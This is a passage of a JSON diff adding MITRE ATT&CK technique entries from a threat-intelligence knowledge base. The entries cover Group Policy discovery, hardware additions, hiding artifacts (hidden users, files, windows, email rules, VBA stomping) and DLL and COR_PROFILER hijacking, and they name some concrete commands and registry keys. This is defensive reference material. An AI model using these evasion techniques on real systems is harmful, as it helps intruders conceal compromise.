Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "type": "uses" + }, + { + "dest-uuid": "9bd53629-fa2c-417d-b937-c575504be5b1", + "type": "similar" + }, + { + "dest-uuid": "d93b51df-014a-4d46-949a-4b8f796e6cca", + "type": "similar" + }, + { + "dest-uuid": "1f28a8a5-7231-47ad-9943-73b3cc6d05b0", + "type": "similar" + }, + { + "dest-uuid": "63a99eb9-0da7-4286-bfc9-c306a03abf24", + "type": "similar" + } + ], + "uuid": "e55d2e4b-07d8-4c22-b543-c187be320578", + "value": "Gather Victim Org Information" + }, + { + "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)][[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)]\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.[[Microsoft gpresult](https://app.tidalcyber.com/references/88af38e8-e437-4153-80af-a1be8c6a8629)][[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)] Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://app.tidalcyber.com/technique/d092a9e1-63d0-415d-8cd0-666a261be5d9)) for their benefit.", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "d97d754d-92d5-4874-bbfe-5aa4d581f2a8", + "value": "Group Policy Discovery" + }, + { + "description": "Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://app.tidalcyber.com/technique/6a7ab25e-49ed-4cd3-b199-5d80b728b416)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.\n\nWhile public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.[[Ossmann Star Feb 2011](https://app.tidalcyber.com/references/1be27354-1326-4568-b26a-d0034acecba2)][[Aleks Weapons Nov 2015](https://app.tidalcyber.com/references/fd22c941-b0dc-4420-b363-2f5777981041)][[Frisk DMA August 2016](https://app.tidalcyber.com/references/c504485b-2daa-4159-96da-481a0b97a979)][[McMillan Pwn March 2012](https://app.tidalcyber.com/references/6b57e883-75a1-4a71-accc-2d18148b9c3d)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "4557bfb9-b940-49b6-b8be-571979134419", + "value": "Hardware Additions" + }, + { + "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets on Windows systems.[[Microsoft Inbox Rules](https://app.tidalcyber.com/references/91ce21f7-4cd5-4a75-a533-45d052a11c5d)][[MacOS Email Rules](https://app.tidalcyber.com/references/f83283aa-3aaf-4ebd-8503-0d84c2c627c4)][[Microsoft New-InboxRule](https://app.tidalcyber.com/references/54fcfc36-e0d5-422f-8a45-eeb7fa077a93)][[Microsoft Set-InboxRule](https://app.tidalcyber.com/references/28cc6142-cc4f-4e63-bcff-94347bc06b37)]\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. [[Microsoft Cloud App Security](https://app.tidalcyber.com/references/be0a1168-fa84-4742-a658-41a078b7f5fa)]\n\nIn some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)] Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.008" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "01505d46-8675-408d-881e-68f4d8743d47", + "value": "Email Hiding Rules" + }, + { + "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name [[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)] [[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]. Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app [[WireLurker](https://app.tidalcyber.com/references/fd33f71b-767d-4312-a8c9-5446939bb5ae)]. On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "14e81a2d-9eca-429c-9fb9-08e109de9f6c", + "value": "Hidden Files and Directories" + }, + { + "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)]\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.[[MalwareTech VFS Nov 2014](https://app.tidalcyber.com/references/c06af73d-5ed0-46a0-a5a9-161035075884)][[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)] Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.[[ESET ComRAT May 2020](https://app.tidalcyber.com/references/cd9043b8-4d14-449b-a6b2-2e9b99103bb0)] Adversaries may also fragment files across the existing file system structure in non-standard ways.[[Kaspersky Equation QA](https://app.tidalcyber.com/references/34674802-fbd9-4cdb-8611-c58665c430e5)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.005" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9e6268a5-a979-4219-b0ad-76094a9876c7", + "value": "Hidden File System" + }, + { + "description": "Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users. \n\nIn macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value Hide500Users to TRUE in the /Library/Preferences/com.apple.loginwindow plist file.[[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)] Every user has a userID associated with it. When the Hide500Users key value is set to TRUE, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the dscl utility to create hidden user accounts by setting the IsHidden attribute to 1. Adversaries can also hide a user’s home folder by changing the chflags to hidden.[[Apple Support Hide a User Account](https://app.tidalcyber.com/references/e901df3b-76a6-41a5-9083-b28065e75aa2)] \n\nAdversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)][[US-CERT TA18-074A](https://app.tidalcyber.com/references/94e87a92-bf80-43e2-a3ab-cd7d4895f2fc)]\n\nOn Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manger (GDM), accounts may be hidden from the greeter using the gsettings command (ex: sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true).[[Hide GDM User Accounts](https://app.tidalcyber.com/references/88c3c460-3792-4881-ae7d-031c8901610d)] Display Managers are not anchored to specific distributions and may be changed by a user or adversary.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "487916b2-99f6-40cd-8529-5a81d2f199db", + "value": "Hidden Users" + }, + { + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nOn Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), Jscript, and [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. [[PowerShell About 2019](https://app.tidalcyber.com/references/2c504602-4f5d-47fc-9780-e1e5041a0b3a)]\n\nSimilarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.[[Antiquated Mac Malware](https://app.tidalcyber.com/references/165edb01-2681-45a3-b76b-4eb7dee5dab9)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd", + "value": "Hidden Window" + }, + { + "description": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.[[Linux Signal Man](https://app.tidalcyber.com/references/63483956-fa3e-52da-a834-b3b762c4e84e)] These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.[[nohup Linux Man](https://app.tidalcyber.com/references/f61dde91-3518-5a74-8eb8-bb3bae43e8fb)][[Microsoft PowerShell SilentlyContinue](https://app.tidalcyber.com/references/ece52a64-1c8d-547d-aedc-ff43d7418cd2)] This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://app.tidalcyber.com/technique/82c07e34-9f67-4f4e-a513-c22a17b508e5) this does not establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) since the process will not be re-invoked once actually terminated.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.011" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "9e55bc80-a187-58f7-a687-d37bbd618db7", + "value": "Ignore Process Interrupts" + }, + { + "description": "Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. [[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)] Within MFT entries are file attributes, [[Microsoft NTFS File Attributes Aug 2010](https://app.tidalcyber.com/references/dc4689d2-54b4-4310-ac10-6b234eedbc16)] such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). [[SpectorOps Host-Based Jul 2017](https://app.tidalcyber.com/references/5fbf3a1d-eac2-44b8-a0a9-70feca168647)] [[Microsoft File Streams](https://app.tidalcyber.com/references/ef3f58da-e735-4b1d-914c-fafabb7439bf)] [[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)] [[Microsoft ADS Mar 2014](https://app.tidalcyber.com/references/eae434ff-97c0-4a82-9f80-215e515befae)]\n\nAdversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. [[Journey into IR ZeroAccess NTFS EA](https://app.tidalcyber.com/references/e9dff187-fe7d-469d-81cb-30ad520dbd3d)] [[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.004" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "3b12e647-2bbd-4d84-9abe-401ad4230b6d", + "value": "NTFS File Attributes" + }, + { + "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.[[Microsoft PEB 2021](https://app.tidalcyber.com/references/e0ec4cf6-1e6a-41ab-8704-a66c5cc4d226)][[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)]\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) WriteProcessMemory() function) then resume process execution with malicious arguments.[[Cobalt Strike Arguments 2019](https://app.tidalcyber.com/references/e845f741-eabe-469b-97c1-f51a2aeb18b0)][[Xpn Argue Like Cobalt 2019](https://app.tidalcyber.com/references/724464f6-1a86-46e3-9a81-192b136c73ba)][[Nviso Spoof Command Line 2020](https://app.tidalcyber.com/references/a3fa92ed-763c-4082-8220-cab82d70fad4)]\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://app.tidalcyber.com/technique/449abc18-9faf-4ea6-a420-34528c28301d)) to manipulate or further evade process-based detections.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.010" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f5732b2d-0548-4574-bcc8-59ceef24aeeb", + "value": "Process Argument Spoofing" + }, + { + "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.[[macOS Hierarchical File System Overview](https://app.tidalcyber.com/references/4b8b110a-fc40-4094-a70d-15530bc05fec)] Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.[[Resource and Data Forks](https://app.tidalcyber.com/references/b8eaf053-40e0-414e-a89e-409dbf218554)][[ELC Extended Attributes](https://app.tidalcyber.com/references/e62d67ed-48d0-4141-aacc-92e165d66f16)]\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.[[sentinellabs resource named fork 2020](https://app.tidalcyber.com/references/0008dfd8-25a1-4e6a-9154-da7bcbb7daa7)][[tau bundlore erika noerenberg 2020](https://app.tidalcyber.com/references/1c62ed57-43f7-40d7-a5c9-46b40a40af0e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.009" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "644d820e-6f64-4404-a861-cfa8b18b42a6", + "value": "Resource Forking" + }, + { + "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.[[SingHealth Breach Jan 2019](https://app.tidalcyber.com/references/d1f699e3-7c9d-4a95-ad58-f46e665a4d37)]\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.006" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "7564b45e-55d9-4ffa-8e08-b08b0aa82182", + "value": "Run Virtual Instance" + }, + { + "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.[[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)]\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.[[Evil Clippy May 2019](https://app.tidalcyber.com/references/aafa27e8-5df7-4fc6-9fe5-9a438f2b507a)][[Microsoft _VBA_PROJECT Stream](https://app.tidalcyber.com/references/70c75ee4-4ba4-4124-8001-0fadb49a5ac6)]\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.[[Walmart Roberts Oct 2018](https://app.tidalcyber.com/references/d1c88a57-85f4-4a35-a7fa-35e8c7fcd943)][[FireEye VBA stomp Feb 2020](https://app.tidalcyber.com/references/bd034cc8-29e2-4d58-a72a-161b831191b7)][[pcodedmp Bontchev](https://app.tidalcyber.com/references/3057d857-6984-4247-918b-952b75ee152e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1564.007" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "1e3d9e0a-6744-44e4-836d-1db38a4cc99c", + "value": "VBA Stomping" + }, + { + "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)][[Cybereason OSX Pirrit](https://app.tidalcyber.com/references/ebdf09ed-6eec-450f-aaea-067504ec25ca)][[MalwareBytes ADS July 2015](https://app.tidalcyber.com/references/b552cf89-1880-48de-9088-c755c38821c1)]\n\nAdversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.[[Sophos Ragnar May 2020](https://app.tidalcyber.com/references/04ed6dc0-45c2-4e36-8ec7-a75f6f715f0a)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Office 365", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "01505d46-8675-408d-881e-68f4d8743d47", + "type": "similar" + }, + { + "dest-uuid": "14e81a2d-9eca-429c-9fb9-08e109de9f6c", + "type": "similar" + }, + { + "dest-uuid": "9e6268a5-a979-4219-b0ad-76094a9876c7", + "type": "similar" + }, + { + "dest-uuid": "487916b2-99f6-40cd-8529-5a81d2f199db", + "type": "similar" + }, + { + "dest-uuid": "5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd", + "type": "similar" + }, + { + "dest-uuid": "9e55bc80-a187-58f7-a687-d37bbd618db7", + "type": "similar" + }, + { + "dest-uuid": "3b12e647-2bbd-4d84-9abe-401ad4230b6d", + "type": "similar" + }, + { + "dest-uuid": "f5732b2d-0548-4574-bcc8-59ceef24aeeb", + "type": "similar" + }, + { + "dest-uuid": "644d820e-6f64-4404-a861-cfa8b18b42a6", + "type": "similar" + }, + { + "dest-uuid": "7564b45e-55d9-4ffa-8e08-b08b0aa82182", + "type": "similar" + }, + { + "dest-uuid": "1e3d9e0a-6744-44e4-836d-1db38a4cc99c", + "type": "similar" + } + ], + "uuid": "f37f0cd5-0446-415f-9309-94e25aa1165d", + "value": "Hide Artifacts" + }, + { + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.[[Microsoft Profiling Mar 2017](https://app.tidalcyber.com/references/eb0909ea-616c-4d79-b145-ee2f1ae539fb)][[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.[[Microsoft COR_PROFILER Feb 2013](https://app.tidalcyber.com/references/4e85ef68-dfb7-4db3-ac76-92f4b78cb1cd)]\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) provided by .NET processes.[[RedCanary Mockingbird May 2020](https://app.tidalcyber.com/references/596bfbb3-72e0-4d4c-a1a9-b8d54455ffd0)][[Red Canary COR_PROFILER May 2020](https://app.tidalcyber.com/references/3d8cb4d3-1cbe-416a-95b5-15003cbc2beb)][[Almond COR_PROFILER Apr 2019](https://app.tidalcyber.com/references/a49c5870-2a48-4cd7-8b4e-e80c5414f565)][[GitHub OmerYa Invisi-Shell](https://app.tidalcyber.com/references/26c1b8f4-ff59-409e-b616-04eee38a8a9f)][[subTee .NET Profilers May 2017](https://app.tidalcyber.com/references/6ef42019-5393-423e-811d-29b728c877e1)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.012" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "110c385f-9f27-4fd6-837c-6261294073ab", + "value": "COR_PROFILER" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. [[Microsoft Dynamic Link Library Search Order](https://app.tidalcyber.com/references/7b1f945b-2547-4bc6-98bf-30248bdf3587)][[FireEye Hijacking July 2010](https://app.tidalcyber.com/references/536f9987-f3b6-4d5f-8a6b-32a0c651500d)] Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\n\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, [[OWASP Binary Planting](https://app.tidalcyber.com/references/86fc5a62-385e-4c56-9812-138db0808fba)] by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.[[FireEye fxsst June 2011](https://app.tidalcyber.com/references/06f8f5b2-2ebe-4210-84b6-f86e911a7118)] Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. [[Microsoft Security Advisory 2269637](https://app.tidalcyber.com/references/fa3d303e-bb1a-426d-9387-e92fc1ea75bc)]\n\nAdversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.[[Microsoft Dynamic-Link Library Redirection](https://app.tidalcyber.com/references/72458590-ee1b-4447-adb8-ca4f486d1db5)][[Microsoft Manifests](https://app.tidalcyber.com/references/e336dc02-c7bb-4046-93d9-17b9512fb731)][[FireEye DLL Search Order Hijacking](https://app.tidalcyber.com/references/0ba2675d-4d7f-406a-81fa-b87e62d7a539)]\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1574.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": 